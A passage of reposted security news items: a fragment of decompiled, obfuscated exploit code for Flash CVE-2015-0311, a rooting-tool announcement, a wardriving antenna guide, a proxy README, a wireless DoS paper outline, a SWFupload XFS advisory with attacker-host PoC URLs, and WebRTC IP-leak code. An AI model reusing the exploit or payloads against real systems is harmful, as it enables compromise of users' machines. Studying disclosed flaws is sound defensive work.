_loc10_ + 4; this.52142316823181123423632234(_loc10_,this.52142314323156123423632234); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,this.52142315023163123423632234); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,1052672); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,0); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,this.override const); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,this.52142315023163123423632234); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,this.52142311823131123423632234 + _loc9_); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,this.5214239823111123423632234); _loc10_ = _loc10_ + 4; _loc10_ = this.52142311823131123423632234 + _loc9_; this.52142316823181123423632234(_loc10_,2.202598544E9); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,1413607652); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,2.202555713E9); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,1994932460); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,1207959552); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,1094763651); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,2.421965149E9); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,3.209203856E9); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,this.52142318423197123423632234 - 16); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,this.5214239823111123423632234); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,3.096481936E9); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,this.52142317123184123423632234); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,3.209168777E9); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,_loc7_); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,this.5214239823111123423632234); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,542662); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,3.372204081E9); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,2.160037192E9); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,1224736766); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,1200224905); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,16824584); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,2.370306048E9); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,196799); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,1705702144); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,621054792); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,16); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,3.100019016E9); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,this.521423812394123423632234); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,147227464); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,4.168418873E9); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,1223723336); _loc10_ = _loc10_ + 4; if(!this.return const) { this.52142316823181123423632234(_loc10_,2.370361225E9); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,98458); _loc10_ = _loc10_ + 4; } else { this.52142316823181123423632234(_loc10_,2.370360969E9); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,98490); _loc10_ = _loc10_ + 4; } this.52142316823181123423632234(_loc10_,3.2973312E9); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,2.425393347E9); _loc10_ = _loc10_ + 4; param1.position = 0; while(param1.position < param1.length) { _loc11_ = param1.readUnsignedInt(); this.52142316823181123423632234(_loc10_,_loc11_); _loc10_ = _loc10_ + 4; } } private final function do var() : Boolean { var _loc4_ = true; var _loc5_ = false; var _loc1_:uint = (this.null const - 8) / 4; this.52142311923132123423632234[_loc1_] = this.do; var _loc2_:uint = this.break for + 1; var _loc3_:Vector.<uint> = this.521423262339123423632234[_loc2_] as Vector.<uint>; _loc3_.length = this.52142317123184123423632234 * 2; return true; } private final function finally const() : ByteArray { var _loc1_ = true; var _loc2_ = false; return this.false const.set(this.static for); } private final function import for(param1:String) : Boolean { var _loc3_ = false; var _loc4_ = true; if(!this.52142317723190123423632234()) { return false; } this.false const = new 52142312223135123423632234(this.52142313423147123423632234(param1)); this.include set(); this.52142316923182123423632234(); if(!this.521423722385123423632234()) { return false; } if(!this.while var()) { return false; } if(!this.const const()) { return false; } var _loc2_:Boolean = this.52142392322123423632234(); if(!this.dynamic const) { if(!_loc2_) { this.52142314923162123423632234(); return false; } if(!this.default var()) { this.52142314923162123423632234(); return false; } this.const for(this.get var()); if(!this.521423742387123423632234()) { this.52142314923162123423632234(); return false; } } else { if(!_loc2_) { this.dynamic var(); return false; } if(!this.52142312323136123423632234()) { this.dynamic var(); return false; } this.throw set(this.finally const()); if(!this.do var()) { this.dynamic var(); return false; } } return true; } private final function 521423132326123423632234(param1:String) : String { var _loc5_ = false; var _loc6_ = true; var _loc2_:ByteArray = null; var _loc3_:ByteArray = null; try { _loc2_ = function var.null set(param1); _loc3_ = 52142317523188123423632234.52142342317123423632234(_loc2_); return _loc3_.readUTFBytes(_loc3_.length); } catch(error:Error) { } return null; } private final function 52142313423147123423632234(param1:String) : String { var _loc11_ = false; var _loc12_ = true; var _loc9_ = 0; var _loc10_:String = null; var _loc2_:String = null; var _loc3_:String = function var.52142310823121123423632234(unescape(param1)); var _loc4_:Number = _loc3_.length; if(_loc4_ < this.521423192332123423632234 + 1) { return _loc2_; } var _loc5_:String = _loc3_.substr(_loc4_ - this.521423192332123423632234,this.521423192332123423632234); _loc2_ = _loc3_.substr(0,_loc4_ - this.521423192332123423632234); var _loc6_:int = loaderInfo.loaderURL.lastIndexOf("/") + 1; var _loc7_:String = loaderInfo.loaderURL.substr(0,_loc6_); _loc2_ = unescape(_loc7_ + _loc2_); var _loc8_:String = this.521423132326123423632234(this.52142318723200123423632234); if(_loc8_ != null) { _loc9_ = 3; if(_loc8_.length < _loc9_) { return _loc2_; } _loc8_ = _loc8_.substr(0,_loc8_.length - _loc9_); _loc10_ = 52142362319123423632234.52142318323196123423632234(_loc2_ + _loc8_); this.static for = _loc10_ == _loc5_?1:0; } return _loc2_; } private final function continue(param1:Event = null) : void { var _loc2_ = true; var _loc3_ = false; removeEventListener(Event.ADDED_TO_STAGE,this.continue); this.import for(stage.loaderInfo.parameters[_a_--._a_--(-1820302790)].toString()); } } } Sursa: KernelMode.info • View topic - CVE-2015-0311

giefroot A tool to root your device using CVE-2014-7911 (by Keen Team) and CVE-2014-4322 (by zxz0O0). System rw access & SuperSU installation. Requirements USB debugging enabled Settings => About phone => Click 7 times on Android Build to unlock developer options Allow mock locations Settings => Developer Settings adb drivers installed Firmware < October 2014 (kernel and system) How to use Download the tool (latest version) and extract it Start your device and plug it to your computer Put your device in air plane mode Run install.bat and follow the instructions on screen Congratulations! You should now be rooted. If you get an error "Device not rooted", try running the tool a second time. Don't forget to make a donation What can you do next Make a donation to the people involved Backup TA partition / DRM keys http://forum.xda-developers.com/show....php?t=2292598 Install dualrecovery by [NUT] Download Z??-lockeddualrecovery2.X.XXX-BETA.installer.zip from -=- [NUT]'s XDA download page -=-, run install.bat and select Option #1 Note if you have problems after installing recovery, this thread is not the place to ask for help! Download v2 Thanks to Big thanks to Keen Team for developing the CVE-2014-7911 exploit. Original thread: http://forum.xda-developers.com/mate...6/post57991147 Code: 88 a8P 88888888888 88888888888 888b 88 88 ,88' 88 88 8888b 88 88 ,88" 88 88 88 `8b 88 88,d88' 88aaaaa 88aaaaa 88 `8b 88 8888"88, 88""""" 88""""" 88 `8b 88 88P Y8b 88 88 88 `8b 88 88 "88, 88 88 88 `8888 88 Y8b 88888888888 88888888888 88 `888 Huawei Ascend Mate 7 root utility Present by Keen Team: Liang Chen, flanker017 - CVE-2014-7911 exploit idl3r - Kernel vulnerability and exploit Special thanks to: Yaron Lavi and Nadav Markus from Palo Alto Networks for "Mock Location" trick Chainfire for SuperSU KingRoot (kingroot??_??ROOT??_ROOT????_??????ROOT??) for testing devices Tested on MT7-TL10 and MT7-CL00 China Domestic edition with B122 SP06 (2014/12/30) May or may not work on international editions Additionally, thanks to: Chainfire: SuperSU developer MohammadAG: Disable RIC kernel module (Link) idler1984: Trick for stopping system_server Changelog v2 Fix phone rebooting before exploit completed (thanks idler1984!) Fix error allocating memory for exploit code . [*]v1 Initial release XDA: DevDB Information giefroot - rooting tool, Tool/Utility for the OEM Cross Device Development Contributors zxz0O0 Version Information Status: Beta Created 2015-01-24 Last Updated 2015-01-26 Sursa: http://forum.xda-developers.com/crossdevice-dev/sony/giefroot-rooting-tool-cve-2014-4322-t3011598

Antenna Theory for Wardriving and Penetration Testing Introduction Wardriving is an activity in which a person seeks wireless access points in moving vehicles with high gain antennas mounted on the top. Usually, this access point data is correlated with GPS positions and marked on publicly accessible maps such as WiGLE. On the other hand, wireless penetration tests are focused evaluations of wireless security pertaining to an organization. In both of these cases—and any type of wireless communication—antennas play a critical role. They can mean the difference between hassle-free communication and bitter frustration. However, antenna designs and related implications are arcane topics in requirement of sincere exploration by security enthusiasts. The antennas in your arsenal can make or break your wardriving or wireless penetration testing efforts. Whether you are a wardriving aficionado or a wireless penetration tester, this paper is intended to help you deduce the best antenna for your requirements. Terminology You Should Know Wi-Fi operates in the 2.4 GHz radio frequency that is measured in decibels or db. In order to be able to comprehend discussions germane to the performance of antennas, you must familiarize yourself with the following terms: dBm – dBm means decibel milliwatts. Wi-Fi network signal levels are usually measured using dBm. The negative sign is used because the transmission power is never strong enough for the signal level to be positive. For instance, to get a 0.00 dBm signal, you would need a transmission power of 0.001 watts. -30 dBm- Maximum possible value; you are right next to the access point (within a few feet). -67 dBm- Minimum requirement for timely packet delivery (e.g. for VoIP or video streaming). -70 dBm- Minimum requirement for reliable packet delivery (e.g. for web surfing). -80 dBm- Minimum requirement for maintaining a basic connection; you will experience some packet drops. -90 dBm- Barely able to maintain a connection; SNR is low; functionality is severely impaired. Link Quality: Simply stated, link quality is indicative of the SNR (Signal to Noise Ratio), which is a measurement of interference versus the strength of your ‘point-to-point’ or ‘point-to-multipoint’ link. Accordingly, higher link quality will imply lower number of packet errors. Antenna Gain: Do not be confused by this term, the antenna does not actually amplify anything. Antenna gain is a figure that reflects how efficiently your receiving antenna would convert Wi-Fi radio waves into electrical power. Antennas with a gain of 2 dBi, 5 dBi, 7dBi, 9 dBi, 13 dBi etc are available. A common mistake is to think that the one with a high dBi would be the best (e.g. 13 dBi). To understand why this is a misconception, consider the following rough sketch [Figure 1]: Figure 1 As evident from this figure, a higher (9) dBi antenna is suitable for long horizontal ranges with the receiver and transmitter at roughly the same elevation. However, if the transmitter is placed vertically above the receiver—as in floors of a building—then a 5 dBi antenna would be your best bet. If the transmitter is at a different elevation and at a long distance from the receiver, a 7 dBi antenna would offer you the right combination of elevation and range. A 2 dBi antenna aims to cover signals equally in all directions, and is not well-suited for wireless penetration testing or wardriving. How well do these antennas work? The short answer is: If correctly chosen, they perform well. The right type of antenna, with proper orientation, is able to pick up signals from miles away. However, it is imperative to point out here that many users who purchase external antennas end up being dissatisfied with their performance. The reasons for this are: Unrealistic expectations: This may seem obvious but these antennas are not magical devices that will pick up signals from great distances, especially when they are improperly chosen (wrong type of antenna) or have not been calibrated (aligned) well. Insufficient knowledge: If you are purchasing a wireless antenna, or constructing a custom one, you should be able to define your purpose and have the knowledge to choose the proper antenna that would satisfy this purpose. To test how well an external antenna performs in contrast with a laptop’s default antenna under the same conditions, we set up the following experiment. The distance between the access point and our antennas was carefully chosen so that the internal antenna could barely receive a signal at this point. Interfaces: ‘wlan0?- internal antenna, ‘wlan1?- external antenna, omnidirectional, 5 dBi Distance between AP and antennas: 7.62 meters or 25 feet Obstructions: Two concrete walls and two trees We noticed that at this distance, using the internal antenna, we were barely able to ping the wireless router at 192.168.0.1. As evident from the roundtrip delay time of several milliseconds [Figure 2], the internal antenna was performing poorly and there were multiple packet drops. Figure 2 At the same distance, our standard 5 dBi omidirectional external antenna was able to outperform the internal antenna, as evident by the decreased roundtrip delay time [Figure 3]. Figure 3 Let us examine the performance of both antennas in terms of link quality and signal levels. For the internal antenna, both the link quality and the signal level were extremely poor [Figure 4]. Figure 4 We were able to obtain a reliable connection using the external antenna under same conditions [Figure 5]. Figure 5 These results indicate that there is a definite performance boost when an external antenna is used—how significant this boost is would depend on the suitability of the antenna for the receiving conditions. This brings us to the next section. Choosing the Right Type of Antenna There are a variety of antenna types, and each type is built with specific needs in mind. There is no “best antenna for wardriving or penetration testing”. Understanding the design and purpose of each of these would help you choose the best one. An omnidirectional antenna spreads energy equally in all directions—which means shorter range. A directional antenna is able to take this same energy and focus it towards a particular direction—implying longer range in that direction. Omni-Directional Antennas This is the most common antenna type, and most if not all of you have seen one up close. For instance, the antenna on top of your car is an omnidirectional antenna. These can be used for ‘point-to-multipoint’ purposes such as to serve as the wireless router antenna that transmits signals to all devices in the vicinity [Figure 6]. These are not suitable to be used for point-to-point communications because transmitting signals in all directions, when you want them to go from point A to point B, is an inefficient choice. Figure 6 Suitability for wardriving: These are ideally suited for wardriving, since they grab signals from all directions while you are driving. However, there are some considerations: a 9 dBi omnidirectional antenna would allow you to capture far off signals from all directions, but it will miss access points in high buildings close to your vehicle. To understand why, see Figure 1. Accordingly, it is advised that you choose the correct dBi omnidirectional antenna suited for the areas you are going to drive in. Suitability for penetration testing: During a penetration test, you are aware of your target. Hence, a directional antenna pointed toward the target is more efficient than an omnidirectional antenna. However, you can use a 5 dBi omnidirectional antenna during perimeter testing. Parabolic Antennas Parabolic antennas depend on a curved parabolic surface dish that focuses signals towards a central point [Figure 7]. This enables these antennas to put out incredible gains. However, parabolic antennas are highly directional, which means you need to ensure that they are pointed in the right direction, otherwise they might completely “shield” the signal. Because of their high gain, they are suitable for long range point to point communications. Figure 7 Suitability for wardriving: A parabolic antenna would pick up wireless signals from miles away but only from a single direction at a time. Hence, if you want to map Wi-Fi access points in multiple directions while driving, this is not the best choice. Suitability for penetration testing: Given their long range, parabolic antennas can be very suitable for targeted wireless intrusions, since they allow you to carry out tests from far away once you have positioned them toward target access points. Yagi Antennas Yagi antennas, named after Dr. Hidetsugu Yagi, have a central beam with many individual elements supported by this beam [Figure 8]. These elements constitute radiators and reflectors. A variation is the ‘Vagi’ antenna, which is comprised of two beams side by side. Figure 8 Suitability for wardriving: Yagi antennas are directional, which means they are not the best choice during wardriving. They would pick up far off signals from a particular direction, while missing out on signals in the other directions. Suitability for penetration testing: Like parabolic antennas, Yagi antennas are capable of picking up signals from miles away. Their high gain (e.g. 25 dBi) makes them ideal for penetration testing when you have them pointed towards the target. The Vagi antenna is an attractive choice for penetration testing since they are small and lightweight, yet offer substantial gains. Backfire antennas Backfire antennas are known to have a small size but a significant gain. This makes them a very attractive choice for point-to-point or point-to-multipoint communications. How do they differ from parabolic antennas? There is no parabola; the reflector surface is flat. Their resonant cavity structural design makes them capable of achieving the high gain. For suitability toward wardriving and penetration testing, see ‘Parabolic Antennas’. Building Your Own High Gain Antenna If you have followed this discussion on antennas so far, building your own antenna can be a fun exercise. For this, you will need: About 1-2 inch of 12 gauge copper wire or an omnidirectional antenna A smooth metallic parabolic reflector such as aluminum foil, a can, an 8 inch dumpling strainer, etc. How to Make a Cantenna Cantennas, antennas made out of cans, have been very popular among enthusiasts since they are easy to make and everything you need is in your home. The idea is to use a ‘Pringles’ or similar can, and introduce a copper wire near the bottom from the side of the can [Figure 9]. Calculations regarding the placement of the copper wire need to be precise. You can use this calculator to ensure accuracy. Figure 9 However, if the can is very narrow, you would need to point this antenna very precisely towards the signal direction and even then you would not notice significant gain. Moreover, if you are using a long cable, signals would suffer attenuation. Note: Although a Pringles can is often mentioned, it is not a good can to be used for these purposes since it is too narrow. In fact, any cantenna is a bad choice for serious penetration testing. How to Make a Parabolic Antenna If you have an omnidirectional antenna available [Figure 6], the task becomes easier. Now, all you need to do is find a parabolic reflector that can “turn” this omnidirectional antenna into a parabolic antenna. This parabolic reflector can be any smooth metallic surface that can converge radio signals over the omnidirectional antenna—and this is what improves the antenna gain [Figure 10]. Figure 10 Accurate placement of the omnidirectional antenna in front of the parabolic reflector is of prime significance. There is no increase in antenna gain if an inexperienced person has placed the omnidirectional antenna too far or too close to the parabolic reflector so that it completely misses the focal point. Hence, for accuracy, use this parabolic antenna focal point calculator. Alternatively, if you prefer to avoid making calculations, you can use freely available parabolic reflector templates which have been drawn to scale. These templates explicitly mark the focal point of the parabolic reflector so that you do not have to make calculations. For instance, you can print and use the parabolic reflector template in Figure 11. You would need a square sheet of reflective material that you can place vertically on the straight line drawn in this template, and bend the sheet until it synchronizes with the parabolic curve in the template. Notice the marked focal point (black spot) in the template; place the omnidirectional antenna at that point. Figure 11 Note: We have discussed making parabolic reflectors; however, if you want to build a 2.4 GHz omnidirectional antenna from scratch, it can get quite convoluted. You can follow this link to build such an omnidirectional antenna. Comparison to Commercial Antennas These homemade antennas are capable of giving you results as good as commercial antennas. However, you need to be accurate while building these. Imprecise measurements, design flaws, or implementation errors would result in inefficient antennas with no significant gain. Turning Your Laptop’s Internal Antenna to an External Antenna In case you have some 5 or 7 dBi antennas from your old wireless router lying around [Figure 6], and you want to avoid purchasing a USB antenna unit, you can attach these to your laptop’s built-in internal antenna unit. For this, you will need: U.FL male to RP-SMA pigtail cable Knowledge of laptop disassembly and assembly, and relevant tools Any 2.4 GHz antenna [Figure 6] You would need to disassemble your laptop using required tools and locate the auxiliary antenna connector on the motherboard [Figure 12]. The U.FL side of the cable would fit into this auxiliary connector, and the other side should be fixed along the laptop’s edges such that you can attach your 2.4 GHz external antenna to this SMA (SubMiniature version A) end. Figure 12 Detriments to Wireless Signals Even with the right type of antenna, you may experience weak connections characterized by frequent packet drops and delays. In these situations, one or more of these factors may be the cause: Distance: The most obvious reason is that you are too far from the transmitter. Signals get attenuated over long distances, especially when omnidirectional transmitters are being used, such as those used by common wireless routers. Weather: If an efficient transmitting antenna is being used at the right frequency, weather would have little effect on wireless signals. However, rain can absorb radio signals and enervate Wi-Fi signals at 2.4 GHz. Objects in path: Signals at 2.4 GHz frequency need a clear ‘line-of-sight’ for efficient propagation. This means that trees and walls act as obstructions to the wireless signal. Other access points – If there are other APs in the vicinity that are working on the same channel in crowded areas, this would cause substantial disturbance. Conclusion Wardriving is not illegal as long as you are aware of your limits and avoid nefarious activities such as cracking encryption, retrieving access point passwords, and accessing the Internet for free—known as Piggybacking. For wardriving, you can use a 7 dBi omnidirectional antenna placed on top of your vehicle using a magnetic-mount. For wireless penetration testing scenarios in which you want to breach the security of a particular establishment, it is best to use parabolic reflectors pointed towards the target. Depending on the conditions, these parabolic antennas would allow you carry out wireless penetration tests from a long distance which would lower the risk of being noticed by security personnel. Furthermore, using high gain directional antennas, you are able to ascertain how close to the target perimeter would the potential attackers need to be in order to intrude on wireless communications. A 5 or 7 dBi omnidirectional antenna can be used while testing premises for the presence of rogue access points. References [1] M. Erskine. (2002-2003) http://www.freeantennas.com/. [Online]. http://www.freeantennas.com/projects/template/ [2] Tim Pozar. Late Night Software. [Online]. http://www.lns.com/papers/BAWUG-antenna101/ [3] R. Dean Straw, L. B. Cebik, and Dave Hallidy, Eds., ARRL Antenna Book, 22nd ed.: The American Radio Relay League, Inc., October 2011. [4] Frank Thornton Russ Rogers, “Understanding Antennas and Antenna Theory,” in WarDriving and Wireless Penetration Testing.: Syngress, 2007, ch. 2, pp. 31-59. By Pranshu Bajpai|January 22nd, 2015 Sursa: http://resources.infosecinstitute.com/antenna-theory-wardriving-penetration-testing/

Run SSH and HTTP(S) on the same port Switcher Switcher is a proxy server which accepts connections and proxies based on which protocol is detected. Currently implemented is: SSH The use case is running HTTP(S) and SSH on the same port. Usage Download release or Build: make To get help: $ ./switcher --help Switcher 1.0.0 usage: switcher [options] Options: --listen <:80> Server Listen Address --ssh <127.0.0.1:22> SSH Server Address --default <127.0.0.1:8080> Default Server Address Examples: To serve SSH(127.0.0.1:22) and HTTP(127.0.0.1:8080) on port 80 $ switcher To serve SSH(127.0.0.1:2222) and HTTPS(127.0.0.1:443) on port 443 $ switcher --listen :443 --ssh 127.0.0.1:2222 --default 127.0.0.1:443 Example Run switcher on HTTP port 80, proxy to SSH on 127.0.0.1:22 and Nginx on 127.0.0.1:8080 $ switcher --listen :80 --ssh 127.0.0.1:22 --default 127.0.0.1:8080 To test HTTP: $ curl -I http://my-server.local HTTP/1.1 200 OK To test SSH $ ssh james@my-server.local -p 80 Password: Why not sslh Switcher is heavily influenced by sslh. It started out as a learning exercise to discover how sslh worked and attempt an implementation in Go. The result is useful in its own right through use of Go's interfaces for protocol matching (making adding new protocols trivial), and lightweight goroutines (instead of forking, which is more CPU intensive under load). License 3-Clause "Modified" BSD Licence. License Sursa: https://github.com/jamescun/switcher

Denial of Service Attacks in WirelessNetworks BUSINESS NEED FOR SECURITY Denial of Service Attacks in WirelessNetworks ByMallikarjun Hangargi Graduate StudentMaster of Science in Information Assurance Northeastern University Table of Contents I. Introduction……………………………………………………………………………………………………………………1 II. Jamming (intentional interference) & unintentional interference at the Physical layer….2 III. Intentional DoS at the Media Access Control (MAC) layer like Masquerading attacks and Resource exhaustion attack……………………………………………………………………………………………7 A. Lack of management and control frame protection………………………………………………....7 i. Resource Exhaustion attack………………………………………………………………………………….8 ii. De-authentication Flooding attack……………………………………………………………………..10 iii. Disassociation Flooding attack……………………………………………………………………………12 IV. Conclusion……………………………………………………………………………………………………………………14 V. Reference…………………………………………………………………………………………………………………….15 Download: http://packetstorm.foofus.com/papers/wireless/DoS_attacks_in_wireless_networks.pdf

SWFupload 2.5.0 Cross Frame Scripting Authored by MindCracker | Site vulnerability-lab.com SWFupload version 2.5.0 suffers from a cross frame scripting vulnerability. Document Title:=============== SWFupload 2.5.0 - Cross Frame Scripting (XFS) Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1422 Release Date: ============= 2015-01-25 Vulnerability Laboratory ID (VL-ID): ==================================== 1422 Common Vulnerability Scoring System: ==================================== 2.3 Product & Service Introduction: =============================== SWFUpload is a JavaScript Library that wraps the Flash Player`s upload function. It brings your uploads to the next level with Multiple File Selection, Upload Progress and Client-side File Size Checking. Unlike other Flash upload tools, SWFUpload leaves the UI in the developer`s hands. Using a set of event handlers developers can display upload progress and status to the user in their own HTML/CSS UI. SWFUpload has been featured in such projects as YouTube and WordPress. (Copy of the Vendor Homepage: http://sourceforge.net/projects/swfupload.mirror/ ) Abstract Advisory Information: ============================== An indepnedent Vulnerability Laboratory Researcher discovered multiple client-side cross frame scripting vulnerability in the official SWFupload v2.5.0 script. Vulnerability Disclosure Timeline: ================================== 2015-01-25: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Unpublished Affected Product(s): ==================== SF-Editor Product: SWFUpload - JavaScript & Flash Upload Library 2.5.0 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ Multiple Cross Frame Scripting Vulnerabilities has been discovered in the official SWFupload v2.5.0 script. The cross frame scripting vulnerability occurs when a SWF file has the permission or is able able to load another file as source of another directory/site.The vulnerable swf file can be exploited by remote attackers without privileged application user account and low or medium user interaction. As you can see the .buttonTextStyle variable (view: proof of concept) is not well configured (adding the value) and the ButtonTextStyle will accept any value. The vulneralbe SWF will loads any file that is getting attached to the parameter by default configuration. Remote attackers are able to exploit the issue with medium or high user interaction. The security risk of the client-side cross frame scripting web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 2.3. Exploitation of the client-side remote vulnerability requires medium or high user interaction and no privileged application user account. Successful exploitation results in client-side phishing, client-side external redirects and non-persistent manipulation of affected- or connected module context. Vulnerable Service(s): [+] GET Vulnerable File(s): [+] buttontextstyle.swf [+] swfupload.swf Vulnerable Parameter(s): [+] buttonTextStyle Proof of Concept (PoC): ======================= 1.1 The client-side XFS vulnerability can be exploited by remote attackers without privileged application user account and with medium or high user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: http://victim.com/buttontextstyle.swf?buttonTextStyle=http://attack.com/Exploiting.swf[CLIENT-SIDE SCRIPT CODE EXECUTION!] Vulnerable Code : ExternalInterface.addCallback("SetButtonTextStyle",this.SetButtonTextStyle); this.SetButtonTextStyle(String(root.loaderInfo.parameters.buttonTextStyle)); } catch(ex:Object) { this.SetButtonTextStyle(""); } try { 1.2 The client-side XFS vulnerability can be exploited by remote attackers without privileged application user account and with medium or high user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: http://victim.com/swfupload.swf?buttonTextStyle=http://attack.com/Exploiting.swf[CLIENT-SIDE SCRIPT CODE EXECUTION!] ExternalInterface.addCallback("SetButtonText",this.SetButtonText); SetButtonText { this.SetButtonText(String(root.loaderInfo.parameters.buttonText)); } catch(ex:Object) { this.SetButtonText(""); } try { Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse and encode of the vulnerable `buttonTextStyle` value in the buttontextstyle.swf and swfupload.swf files. Restrict the input to the vulnerable values and disallow special chars. Filter with an own exception-ahndling to prevent execution of client-side injected script codes. Security Risk: ============== The security risk of the client-side web vulnerability is estimated as medium. Credits & Authors: ================== MindCracker - Team MaDLeeTs (MindCrackerKhan@gmail.com - Maddy@live.com.pk | https://twitter.com/MindCrackerKhan) Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Sursa: SWFupload 2.5.0 Cross Frame Scripting ? Packet Storm

Get local and public IP addresses in JavaScript STUN IP Address requests for WebRTC Demo: https://diafygi.github.io/webrtc-ips/ What this does Firefox and Chrome have implemented WebRTC that allow requests to STUN servers be made that will return the local and public IP addresses for the user. These request results are available to javascript, so you can now obtain a users local and public IP addresses in javascript. This demo is an example implementation of that. Additionally, these STUN requests are made outside of the normal XMLHttpRequest procedure, so they are not visible in the developer console or able to be blocked by plugins such as AdBlockPlus or Ghostery. This makes these types of requests available for online tracking if an advertiser sets up a STUN server with a wildcard domain. Code Here is the annotated demo function that makes the STUN request. You can copy and paste this into the Firefox or Chrome developer console to run the test. //get the IP addresses associated with an account function getIPs(callback){ var ip_dups = {}; //compatibility for firefox and chrome var RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection; var mediaConstraints = { optional: [{RtpDataChannels: true}] }; //firefox already has a default stun server in about:config // media.peerconnection.default_iceservers = // [{"url": "stun:stun.services.mozilla.com"}] var servers = undefined; //add same stun server for chrome if(window.webkitRTCPeerConnection) servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]}; //construct a new RTCPeerConnection var pc = new RTCPeerConnection(servers, mediaConstraints); //listen for candidate events pc.onicecandidate = function(ice){ //skip non-candidate events if(ice.candidate){ //match just the IP address var ip_regex = /([0-9]{1,3}([B]\.[/B][0-9]{1,3}){3})/ var ip_addr = ip_regex.exec(ice.candidate.candidate)[1]; //remove duplicates if(ip_dups[ip_addr] === undefined) callback(ip_addr); ip_dups[ip_addr] = true; } }; //create a bogus data channel pc.createDataChannel(""); //create an offer sdp pc.createOffer(function(result){ //trigger the stun server request pc.setLocalDescription(result, function(){}); }, function(){}); } //Test: Print the IP addresses into the console getIPs(function(ip){console.log(ip);}); Sursa: https://github.com/diafygi/webrtc-ips

